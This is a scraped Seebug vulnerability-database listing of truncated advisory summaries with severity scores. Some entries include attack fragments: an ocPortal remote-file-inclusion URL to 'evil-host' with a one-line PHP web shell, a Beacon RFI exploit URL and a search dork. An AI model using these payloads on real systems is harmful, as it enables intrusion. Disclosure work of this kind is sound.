Seebug, most viewed

56796 matches found

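seebug.org
added 2012/11/30 12:0 a.m., 79 views

Samsung Printer Firmware Administrative Account Backdoor

BUGTRAQ ID: 56692 CVE(CAN) ID: CVE-2012-4964 Samsung is South Korea's Samsung Electronics, founded in 1969. Samsung printers and some Samsung-made Dell printers contain a hard-coded SNMP community string with full read-write privileges; the string remains valid even when SNMP is disabled in the printer management utility, allowing a remote attacker to take full control of an affected device. Modules released after October 31, 2012 are not affected by this vulnerability. By exploiting it, a remote unauthenticated attacker can (1) access an affected device with administrative privileges, (2) modify the affected device's configuration and access sensitive resources, and (3) execute code. Tools exploiting this vulnerability have reportedly been released. 0 Samsung...

7.5 CVSS, 6.4 AI score, 0.08015 EPSS
Exploits: 1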
seebug.org
added 2011/06/27 12:0 a.m., 79 views

Multiple Security Vulnerabilities in Apple Mac OS X Versions Prior to 10.6.8

Bugtraq ID: 48412 CVE ID: CVE-2011-0196 CVE-2011-0197 CVE-2011-0198 CVE-2011-0199 CVE-2011-0200 CVE-2011-0201 CVE-2011-0202 CVE-2011-0203 CVE-2011-0204 CVE-2011-0205 CVE-2011-0206 CVE-2011-0207 CVE-2011-0208 CVE-2011-0209 CVE-2011-0210 CVE-2011-0211 CVE-2011-0212 CVE-2011-0213 CVE-2011-1132 Apple...

7.8 CVSS, 8.3 AI score, 0.03903 EPSS
Exploits: 3
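seebug.org
added 2011/03/27 12:0 a.m., 79 views

PHP "Zip" Extension "stream_get_contents()" Function Denial-of-Service Vulnerability

BUGTRAQ ID: 46969 CVE ID: CVE-2011-1470 PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. The "stream_get_contents()" function of the PHP "Zip" extension has a denial-of-service vulnerability in its implementation; a remote attacker can exploit it to cause an application crash, denial of service and arbitrary code execution. MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 4.0 PHP PHP 5.x Vendor patch: PHP --- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:...

4.3 CVSS, 9.2 AI score, 0.09521 EPSS
Exploits: 2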
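seebug.org
added 2010/04/12 12:0 a.m., 79 views

Multiple Heap Overflow Vulnerabilities in VMware VMnc Codec HexTile-Encoded Video Chunks

BUGTRAQ ID: 39364 CVE ID: CVE-2009-1565 VMWare is virtual PC software that allows two or more Windows, DOS and LINUX systems to run simultaneously on one machine. The VMWare media decoder includes the VMnc media codec used to play movies recorded by VMware Workstation, VMware Player and VMware ACE. The vmnc.dll library has two integer truncation errors when processing HexTile-encoded video chunks; a user tricked into opening a malformed AVI media file can trigger a heap overflow, leading to arbitrary code execution. VMWare Workstation 6.5.x VMWare Player 2.5.x VMWare...

9.3 CVSS, 6.4 AI score, 0.0621 EPSS
Exploits: 1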
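seebug.org
added 2010/01/16 12:0 a.m., 79 views

Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability

Bugtraq ID: 37806 CVE ID: CVE-2009-4141 Linux is an open-source operating system. A security vulnerability exists in the way the Linux kernel handles locked fasync file descriptors, allowing an attacker to execute arbitrary code with kernel privileges or crash the system. According to Linus's analysis, "the problem is that the same file descriptor can be on multiple fasync lists; it can exist once on a particular fasync list, but file locking is special and uses the 'fl->fl_fasync' list to add an arbitrary file to its own fasync list regardless of the underlying device driver or anything else." The issue arises because it incorrectly assumes that a file can be on only one fasync list, so fasync_helper() clears the FASYNC flag. ...

7.2 CVSS, 0.00979 EPSS
Exploits: 2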
seebug.org
added 2009/12/21 12:0 a.m., 79 views

PHPhotoalbum Remote File Upload Vulnerability

No description provided by source. ...

7.1 AI score
Exploits: 0
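seebug.org
added 2009/11/30 12:0 a.m., 79 views

PHP proc_open() safe_mode_protected_env_var Restriction Bypass Vulnerability

BUGTRAQ ID: 37138 CVE ID: CVE-2009-4018 PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. PHP passes the environment variables specified for proc_open() without performing any checks, which ignores the safe_mode_allowed_env_vars and safe_mode_protected_env_vars settings. A user can bypass the safe_mode restrictions and access any file accessible to the Apache UID. PHP 5.3.x Vendor patch: PHP --- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:...

7.5 CVSS, 6.3 AI score, 0.11341 EPSS
Exploits: 5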
seebug.org
added 2009/07/24 12:0 a.m., 79 views

Multiple Security Vulnerabilities in Mozilla Firefox (MFSA)

Bugtraq ID: 35758 CVE ID: CVE-2009-1194 CVE-2009-2462 CVE-2009-2463 CVE-2009-2464 CVE-2009-2465 CVE-2009-2466 CVE-2009-2467 CVE-2009-2468 CVE-2009-2469 CVE-2009-2471 CVE-2009-2472 CNCVE ID: CNCVE-20091194 CNCVE-20092462 CNCVE-20092463 CNCVE-20092464 CNCVE-20092465 CNCVE-20092466 CNCVE-20092467...

10 CVSS, 7.1 AI score, 0.1323 EPSS
Exploits: 4
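seebug.org
added 2009/06/09 12:0 a.m., 79 views

Apache APR-util Library apr_strmatch_precompile() Function Integer Underflow Vulnerability

BUGTRAQ ID: 35221 CVE(CAN) ID: CVE-2009-0023 Apr-util is the Apache Portable Runtime utility library used by Apache. The apr_strmatch_precompile() function in the strmatch/apr_strmatch.c file of the Apr-util library has an integer underflow vulnerability. If a remote attacker delivers specially crafted input by way of a .htaccess file, the SVNMasterURI directive of the mod_dav_svn module, the mod_apreq2 module or the libapreq2 library, the daemon may crash. APR-util 1.3.4 Vendor patch: Apache Group ------------...

4.3 CVSS, 0.1 AI score, 0.0853 EPSS
Exploits: 1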
seebug.org
added 2008/11/03 12:0 a.m., 79 views

YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability

No description provided by source. Downline Builder id Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc script : http://www.yourfreeworld.com/script/downlinebuilder.php DorK : inurl:tr.php?id= Downline Exploit :...

7.1 AI score
Exploits: 0
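seebug.org
added 2008/08/04 12:0 a.m., 79 views

Apache Tomcat HttpServletResponse.sendError() Cross-Site Scripting Vulnerability

BUGTRAQ ID: 30496 CVE(CAN) ID: CVE-2008-1232 Apache Tomcat is a popular open-source JSP application server. Apache Tomcat not only displays the message argument of an HttpServletResponse.sendError() call on the error page but also uses it in the reason-phrase of the HTTP response, so illegal characters may end up in the HTTP headers. A specially crafted message may lead to a cross-site scripting attack, injecting arbitrary content into the HTTP response. Apache Group Tomcat 6.0.x Apache Group Tomcat 5.5.x Apache Group Tomcat 4.1.x...

4.3 CVSS, 5.3 AI score, 0.75865 EPSS
Exploits: 2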
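seebug.org
added 2007/09/12 12:0 a.m., 79 views

Samba NSS_Info Plugin Local Privilege Escalation Vulnerability

BUGTRAQ ID: 25636 CVE(CAN) ID: CVE-2007-4138 Samba is a suite of programs implementing the SMB (Server Messages Block) protocol to provide cross-platform file and print sharing services. The idmap_ad.so library provides Winbind with an nss_info extension for retrieving a user's home directory path, login shell, primary group id and so on from an Active Directory domain controller; the feature is enabled by setting the winbind nss info option in smb.conf to sfu or rfc2307. Windows' Identity Management for Unix and Services for Unix...

6.9 CVSS, 0.9 AI score, 0.00724 EPSS
Exploits: 1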
seebug.org
added 2007/05/13 12:0 a.m., 79 views

Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability

No description provided by source. Beacon = 2.0Remot file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt? Discovered by ThE TiGeR...

7.1 AI score
Exploits: 0
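seebug.org
added 2007/04/03 12:0 a.m., 79 views

PHP Msg_Receive() Memory Allocation Integer Overflow Vulnerability

BUGTRAQ ID: 23236 PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. The implementation of PHP's msg_receive() function has an integer overflow vulnerability that a local attacker may exploit to escalate privileges. PHP's msg_receive() function uses the maxsize parameter directly in a memory allocation without performing any checks on it, resulting in an integer overflow. The vulnerable code is as follows: PHP_FUNCTION(msg_receive) ... if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rlzlz|blz", &queue, &desiredmsgtype, &outmsgtype,...

6.7 AI score
Exploits: 0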
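seebug.org
added 2007/04/03 12:0 a.m., 79 views

PHP Str_Replace() Integer Overflow Vulnerability

PHP is a widely used web development scripting language. The memory allocation in PHP's str_replace() has an integer overflow that a remote attacker can exploit to execute arbitrary instructions with the privileges of the application process. When str_replace() is called, the code switches to one of two different code paths depending on the length of the search string. A single-character search string is handled by a different function, since this is more efficient. Part of the code of the efficient method is as follows: Z_STRLEN_P(result) = len + (char_count * (to_len - 1)); Z_STRVAL_P(result) = target = emalloc(Z_STRLEN_P(result) + 1); Z_TYPE_P(result) = IS_STRING;...

6.8 AI score
Exploits: 0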
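seebug.org
added 2006/12/08 12:0 a.m., 79 views

Metyus Okul Yonetim Sistemi Uye_giris_islem.ASP SQL Injection Vulnerability

Metyus Okul Yonetim Sistemi is an ASP-based web application. Metyus Okul Yonetim Sistemi does not sufficiently filter user-supplied URI input, so a remote attacker can exploit the vulnerability to carry out SQL injection attacks and obtain sensitive information. The problem is that the 'Uye_giris_islem.ASP' script lacks filtering of user-supplied web parameters; submitting a malicious SQL query as parameter data can alter the original SQL logic and expose sensitive information. MaxiASP Yonetimi 1.0 http://www.maxiasp.com/scriptler.asp?ktno=1 titleRemote Admin Attack - LiderHack.Or...

7.1 AI score
Exploits: 0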
seebug.org
added 2006/11/02 12:0 a.m., 79 views

TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability

No description provided by source. /==========================================/ //tikiwiki version 1.9.5 CVS -Sirius- PoC // Product: Tikiwiki // URL: http://tikiwiki.org/ // RISK: critical /==========================================/ there's a critical security bug in tikiwiki version 1.9.5 CVS...

7.1 AI score
Exploits: 0
seebug.org
added 2021/05/26 12:0 a.m., 78 views

SolarWinds Orion Remote Code Execution Vulnerability (CVE-2021-31474)

...

10 CVSS, 1.4 AI score, 0.94431 EPSS
Exploits: 1
seebug.org
added 2018/06/22 12:0 a.m., 78 views

Insteon Hub PubNub control Channel Message Handler Code Execution Vulnerabilities(CVE-2017-14452~CVE-2017-14455)

Summary Multiple exploitable buffer overflow vulnerabilities exists in the PubNub message handler for the "control" channel of Insteon Hub running firmware version 1012. Specially crafted replies received from the PubNub service can cause buffer overflows on a global section overwriting arbitrary...

9.2 AI score, 0.01879 EPSS
Exploits: 2
seebug.org
added 2018/05/10 12:0 a.m., 78 views

Seagate Personal Cloud Multiple Vulnerabilities (CVE-2018-5347)

Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.” Credit An independent...

10 CVSS, 10 AI score, 0.54163 EPSS
Exploits: 4
seebug.org
added 2018/02/24 12:0 a.m., 78 views

Windows: Global Reparse Point Security Feature Bypass/Elevation of Privilege (CVE-2018-0822)

Windows: Global Reparse Point Security Feature Bypass/Elevation of Privilege Platform: Windows 10 1709 (functionality not present prior to this version) Class: Security Feature Bypass/Elevation of Privilege Summary: It’s possible to use the new Global Reparse Point functionality introduced in Windo...

7.3 AI score, 0.02683 EPSS
Exploits: 3
seebug.org
added 2017/10/12 12:0 a.m., 78 views

LibTIFF PixarLogDecode Remote Code Execution Vulnerability(CVE-2016-5875)

Summary An exploitable heap based buffer overflow exists in the handling of compressed TIFF images in LibTIFF's PixarLogDecode api. A crafted TIFF document can lead to a heap based buffer overflow resulting in remote code execution. The vulnerability can be triggered through any user controlled...

9.3 AI score
Exploits: 1
seebug.org
added 2017/08/08 12:0 a.m., 78 views

Synology Photo Station Unauthenticated Remote Code Execution

Vulnerability Summary The following advisory describes a Remote Code Execution found in Synology Photo Station versions 6.7.3-3432 and earlier / 6.3-2967 and earlier. Personal Photo Station is an online photo album with blog owned and managed by a DSM user. Synology NAS provides the home/photo...

7.5 CVSS, 9 AI score, 0.44573 EPSS
Exploits: 4
seebug.org
added 2017/07/27 12:0 a.m., 78 views

Microsoft Windows Kernel Local Information Disclosure Vulnerability (CVE-2017-8564)

We have discovered that the handler of the 0x120007 IOCTL in nsiproxy.sys (\\.\Nsi device) discloses portions of uninitialized pool memory to user-mode clients, likely due to output structure alignment holes. On our test Windows 7 32-bit workstation, an example layout of the output buffer is as...

2.1 CVSS, 7.4 AI score, 0.03018 EPSS
Exploits: 3
seebug.org
added 2017/07/01 12:0 a.m., 78 views

systemd CVE-2017-9445 Out-Of-Bounds Write Remote Code Execution Vulnerability

Vulnerability description Canonical's Ubuntu developer Chris Coulson found a critical vulnerability that can be used to remotely attack machines running popular operating systems. The vulnerability, CVE-2017-9445, is located in the systemd init system and service manager. A remote...

5 CVSS, 8.3 AI score, 0.55116 EPSS
Exploits: 1
seebug.org
added 2017/04/21 12:0 a.m., 78 views

Chrome Universal XSS via reentrancy in FrameLoader::startLoad (CVE-2016-1697)

VULNERABILITY DETAILS From /third_party/WebKit/Source/core/loader/FrameLoader.cpp: void FrameLoader::startLoad(...) ... ASSERT(client()->hasWebView()); if (m_frame->document()->pageDismissalEventBeingDispatched() != Document::NoDismissal) return; ... m_frame->document()->cancelParsing();...

6.8 CVSS, 8.5 AI score, 0.01849 EPSS
Exploits: 1
seebug.org
added 2017/04/09 12:0 a.m., 78 views

Xen: broken check in memory_exchange() permits PV guest breakout (CVE-2017-7228)

Detailed analysis: Pandavirtualization: Exploiting the Xen hypervisor This bug report describes a vulnerability in memory_exchange() that permits PV guest kernels to write to an arbitrary virtual address with the hypervisor privileges. The vulnerability was introduced through a broken fix for...

7.2 CVSS, 7 AI score, 0.01569 EPSS
Exploits: 4
seebug.org
added 2017/04/07 12:0 a.m., 78 views

QNAP QTS multiple RCE vulnerabilities (CVE-2017-6361, CVE-2017-6360, CVE-2017-6359)

QNAP QTS multiple RCE vulnerabilities The latest version of this advisory is available at: https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt Overview -------- QNAP QTS firmware contains multiple Command Injection (CWE-77) vulnerabilities that can be exploited to gain remote...

10 CVSS, 10.9 AI score, 0.66146 EPSS
Exploits: 5
seebug.org
added 2017/04/06 12:0 a.m., 78 views

AMF3 Java implementations deserialization Vulnerability

Details reference: https://codewhitesec.blogspot.kr/2017/04/amf.html Some Java implementations of AMF3 deserializers derive class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of a flash.utils.IExternalizable. A remote attacker with the ability to...

7.5 CVSS, 9.6 AI score, 0.16239 EPSS
Exploits: 5
seebug.org
added 2016/12/08 12:0 a.m., 78 views

Roundcube 1.2.2: Command Execution via Email

Chinese analysis: http://paper.seebug.org/138/ Author: p0wd3r, LG (Knownsec 404 Security Lab) Roundcube is a widely distributed open-source webmail software used by many organizations and companies around the globe. The mirror on SourceForge, for example, counts more than 260,000 downloads in the last 12 months [1] which is on...

6 CVSS, 8.2 AI score, 0.05621 EPSS
Exploits: 2
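seebug.org
added 2016/03/06 12:0 a.m., 78 views

TurboGate Mail Gateway Vulnerability Collection

Brief description: Another product from Tuobo Software (拓波软件); its user base is quite large. Details: TurboGate is essentially an early version of TurboMail, and TurboGate carries a large number of the vulnerabilities found in TurboMail. Only the vulnerabilities exploitable without logging in are listed here; the vendor can self-check against the TurboMail vulnerabilities. 1. http://.../bugs/wooyun-2016-0167905 TurboGate uses axis2%remote; $alpharand g00dPa$$w0rD $alpharand 1 1 https://images.seebug.org/upload/201603/052322256...

7.1 AI score
Exploits: 0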
seebug.org
added 2016/01/09 12:0 a.m., 78 views

Arbitrary System File Read Vulnerability in the casmain.xgi File of the EWEBS Application Virtualization System

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2015/12/17 12:0 a.m., 78 views

Huaxia Chuangxin (华夏创新) LotApp LotBalance LotWan LotServer Command Execution & SQL Injection Vulnerabilities

No description provided by source...

7.1 AI score
Exploits: 0
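seebug.org
added 2015/05/04 12:0 a.m., 78 views

Kingdee Enterprise Mobile Management Cloud Brute Force + Weak Password

Brief description: As the title says, Kingdee Enterprise Mobile Management Cloud is open to brute force and weak passwords: there is no CAPTCHA, and default passwords are in use. Details: Affected URL: http://mcloud.kingdee.com/mcloud/pages/ POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1 Host: mcloud.kingdee.com Proxy-Connection: keep-alive Content-Length: 301 Origin: http://mcloud.kingdee.com User-Agent: Content-Type:...

7.1 AI score
Exploits: 0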
seebug.org
added 2014/11/13 12:0 a.m., 78 views

Joomla Akeeba Kickstart Unserialize Remote Code Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex/zip' require 'json' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include...

7.5 CVSS, 6.5 AI score, 0.55126 EPSS
Exploits: 6
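seebug.org
added 2014/10/24 12:0 a.m., 78 views

Arbitrary File Inclusion Vulnerability in the Front End of the Latest TinyRise Version

Brief description: An arbitrary file inclusion vulnerability in the latest TinyRise version (20140926); under certain conditions it allows getshell. Details: The vulnerability is in the renderExecute function of the framework/web/controller/Controllerclass.php file: the renderExecute function has an extract variable overwrite; the key code is as follows: public function renderExecute$runfile0123456789,$data0123456789 ...//irrelevant code omitted if$datas0123456789!==null extract$datas0123456789;...

7.1 AI score
Exploits: 0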
seebug.org
added 2014/07/22 12:0 a.m., 78 views

Linux Kernel ptrace/sysret - Local Privilege Escalation Vulnerability

No description provided by source. / CVE-2014-4699 ptrace/sysret PoC by Vitaly Nikolenko [email protected] gcc -O2 pocv0.c This code is kernel specific. On Ubuntu 12.04.0 LTS 3.2.0-23-generic, the following will trigger the GP in sysret and overwrite the PF handler so we can land to our NOP sled...

6.9 CVSS, 7.3 AI score, 0.02324 EPSS
Exploits: 6
seebug.org
added 2014/07/01 12:0 a.m., 78 views

ocPortal 1.0.3 - Remote File Inclusion

No description provided by source. http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. ?php $com = $GETcom; system $com; ? Example of funcs.php if your host support php. ?php echo '?ph...

7.1 AI score
Exploits: 0
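seebug.org
added 2014/07/01 12:0 a.m., 78 views

Plone and Zope Remote Command Execution PoC

BUGTRAQ ID: 49857 CVE ID: CVE-2011-3587 Zope is an open-source web application server written mainly in Python. Zope has a remote command execution vulnerability in its implementation; an attacker can exploit it by sending specially crafted web requests to execute arbitrary commands with the privileges of the Zope/Plone service. 0 Zope 2.13.9 Zope 2.13.8 Zope 2.13 Zope 2.12.19 Zope 2.12 Plone 4.x Vendor patch: Zope ---- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page: http://www.zope.org/ Exploit Title: Plone -...

9.3 CVSS, 6.4 AI score, 0.78546 EPSS
Exploits: 15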
seebug.org
added 2014/07/01 12:0 a.m., 78 views

Samba nttrans Reply - Integer Overflow Vulnerability

No description provided by source. Exploitation: samba nttrans reply integer overflow CVE-2013-4124 samba integer overflow in nttrans reply reading ealist vulnerable samba daemon has a integer overflow to cause remote dos by...

5 CVSS, 0.6 AI score, 0.69008 EPSS
Exploits: 7
seebug.org
added 2014/07/01 12:0 a.m., 78 views

Ammyy Admin 3.2 - Authentication Bypass

No description provided by source. Title: ==== Ammyy Admin - Hidden hard-coded option and Access Control vulnerability. Credit: ====== Name: Bhadresh Patel Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ==== - CVE-2013-5581 for hidden hard-coded option...

5.5 CVSS, 7.6 AI score, 0.03636 EPSS
Exploits: 5
seebug.org
added 2014/07/01 12:0 a.m., 78 views

PHP <= 5.3.6 shmop_read() Integer Overflow DoS

No description provided by source. ?php Exploit Title: PHP =5.3.5 Integer Overflow DoS Date: 12-03-11 Author: Jose Carlos Norte - www.rooibo.com Software Link: www.php.net Version: = 5.3.5 Tested on: Ubuntu Linux CVE : CVE-2011-1092 $shmkey = ftokFILE, 't'; $shmid = shmopopen$shmkey, c, 0644, 100...

7.5 CVSS, 0.5 AI score, 0.17881 EPSS
Exploits: 5
seebug.org
added 2014/07/01 12:0 a.m., 78 views

Adobe Acrobat Reader 7-9 - U3D BoF

No description provided by source. Copyright c 2009, Felipe Andres Manzano [email protected] All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source...

9.3 CVSS, 8.8 AI score, 0.18445 EPSS
Exploits: 9
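seebug.org
added 2013/06/11 12:0 a.m., 78 views

PHP "php_quot_print_encode()" Buffer Overflow Vulnerability (CVE-2013-2110)

Bugtraq ID: 60411 CVE ID: CVE-2013-2110 PHP is an HTML-embedded language. The "php_quot_print_encode()" function (ext/standard/quot_print.c) has a heap-based buffer overflow when parsing strings, allowing an attacker to execute arbitrary code in the context of the application. In addition, a security issue when parsing the MIME type of MP3 files can crash PHP 5.4.15. 0 PHP 5.3.x PHP 5.4.x Vendor solution: PHP 5.4.16 or 5.3.26 fixes this vulnerability; users are advised to download the update: http://www.php.net/...

5 CVSS, 5.7 AI score, 0.06748 EPSS
Exploits: 1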
seebug.org
added 2012/07/20 12:0 a.m., 78 views

Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; Exploit Title: SimpleWebServer 2.2-rc2 - Remote Buffer Overflow Exploit Date: 19/07/2012 Author: mr.pr0n @pr0n Homepage: http://ghostinthelab.wordpress.com/ Software Link: http://www.pmx.it/download/sws-2.2-rc2-i686.exe Version: 2....

7.1 AI score
Exploits: 0
seebug.org
added 2011/11/28 12:0 a.m., 78 views

TinyMCE / flvPlayer Cross Site Scripting / Disclosure

No description provided by source. I want to warn you about multiple vulnerabilities in TinyMCE and flvPlayer and hundreds of web applications and tens millions of web sites. These are Full path disclosure, Content Spoofing and Cross-Site Scripting vulnerabilities in TinyMCE CS and XSS are in...

7.1 AI score
Exploits: 0
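seebug.org
added 2010/04/12 12:0 a.m., 78 views

VMware VMnc Codec HexTile-Encoded Video Chunk Parsing Heap Overflow Vulnerability

BUGTRAQ ID: 39363 CVE ID: CVE-2009-1564 VMWare is virtual PC software that allows two or more Windows, DOS and LINUX systems to run simultaneously on one machine. The VMWare media decoder includes the VMnc media codec used to play movies recorded by VMware Workstation, VMware Player and VMware ACE. The vmnc.dll library lacks input checks when processing HexTile-encoded video chunks; a user tricked into opening a malformed AVI file can trigger a heap overflow, leading to arbitrary code execution. VMWare Workstation 6.5.x VMWare Player 2.5.x VMWare Server...

9.3 CVSS, 6.4 AI score, 0.0621 EPSS
Exploits: 1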
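seebug.org
added 2009/06/22 12:0 a.m., 78 views

Multiple Browsers Security Bypass Vulnerability for HTTP Resources in an HTTPS Content Context

Bugtraq ID: 35403 CVE ID: CVE-2009-2065 CVE-2009-2064 CVE-2009-2066 CVE-2009-2067 CNCVE ID: CNCVE-20092065 CNCVE-20092064 CNCVE-20092066 CNCVE-20092067 Warnings are not displayed correctly when a page operates on resources requested for secure content via an insecure method, which can allow security restrictions in multiple web browsers to be bypassed. An attacker can exploit this vulnerability for phishing attacks or to obtain sensitive information. However, to exploit it the attacker must intercept or control network traffic, for example through man-in-the-middle or DNS poisoning attacks. The following browsers are affected by this vulnerability: Microsoft Internet...

6.8 CVSS, 8.6 AI score, 0.04273 EPSS
Exploits: 1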
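seebug.org
added 2008/10/25 12:0 a.m., 78 views

perlshop.cgi Remote Arbitrary Command Execution

BugCVE: CAN-1999-1374 perlshop.cgi is a web-based online shopping program written in Perl. perlshop.cgi has an input validation vulnerability in its implementation; a remote attacker may exploit it to execute arbitrary commands on the host with the privileges of the web process. The problematic code is here: open MAIL, |$blatloc - -t $to -s $subject || &errtrap Can t open $blatloc!\n $blatloc defines blat, a command-line mail-sending program on NT, and $to is the e-mail address entered by the user; the program does not filter special characters such as "|&", so an intruder can insert system commands into the e-mail address. 3.1 Temporary workaround:...

5 CVSS, 6.5 AI score, 0.01936 EPSS
Exploits: 1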
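seebug.org
added 2008/10/25 12:0 a.m., 78 views

Count.cgi (wwwcount) Remote Buffer Overflow Vulnerability

BugCVE: CVE-1999-0021 BUGTRAQ: 128 Count.cgi (wwwcount) is a very popular CGI program for tracking web site statistics. It is generally used to count web page hits. In October 1997, two remote vulnerabilities were found in this program. The first is relatively minor: it allows remote users to view restricted .GIF files, possibly leaking potentially sensitive data in the .GIF files. The second is more serious: the count.cgi program has a buffer overflow when processing the QUERY_STRING environment variable. A remote attacker can mount an overflow attack by sending an overly long request to the program, executing arbitrary commands on the system with the privileges of the web user. 2.3 Muhammad A. Muquit...

7.5 CVSS, 6.6 AI score, 0.2667 EPSS
Exploits: 1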
Total number of security vulnerabilities: 5000